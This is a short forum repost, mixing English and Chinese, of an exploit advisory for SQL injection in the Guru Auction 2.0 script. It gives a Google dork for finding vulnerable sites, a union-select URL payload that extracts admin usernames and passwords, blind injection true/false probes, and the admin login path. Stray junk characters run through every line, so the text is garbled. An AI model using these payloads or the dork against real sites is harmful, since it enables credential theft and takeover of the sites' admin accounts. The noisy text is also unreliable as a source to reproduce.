Guru Auction 2.0 Multiple SQL Injection Vulnerabilities0 l4 F. S7 n% [6 D5 G! C
( y R! H! N$ n7 r7 m8 P" J作者 : v3n0m$ s0 h+ m, ]7 {4 i& u
应用 : Guru Auction 2.0, I3 f) ?2 X; F: {' I
Price : $49
1 v2 H) U* \) y0 y) ^5 a" \3 ~Vendor : http://www.guruscript.com/
' w, T, e$ G# S/ z7 s0 hGoogle Dork : inurl:subcat.php?cate_id=& p& U! k0 |2 T/ p% |2 t; w
; }4 |! f$ w1 h9 QSQLi p0c:
% `1 {4 ]( r) m~~~~~~~~~~
- R& i/ U( V9 v# [( xhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--) Y9 e$ E2 F z. l- F1 f& \' g
. f! u4 x/ A) o3 ?% _, X0 P $ } I, M% t' b$ }- T
盲注 p0c:7 N, s" H& P) ^( J
~~~~~~~~~~
3 f; ^. {' e$ H9 G7 g. a1 e; |http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true" Y6 k7 U% t; @. f5 r ]
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false' X$ U. u6 G5 }* o0 r" Y6 q
; K! H6 ?( m# _2 i管理登录入口:
4 U4 R, N1 C4 } k+ g$ o1 C* N~~~~~~~~~~7 P( }# Z# O3 w# U# x' Q" c( `
http://domain.tld/[path]/admin/
7 V% P5 h& o- e$ H* Y |
发表于 2012-12-31 09:24:05
收藏
支持
反对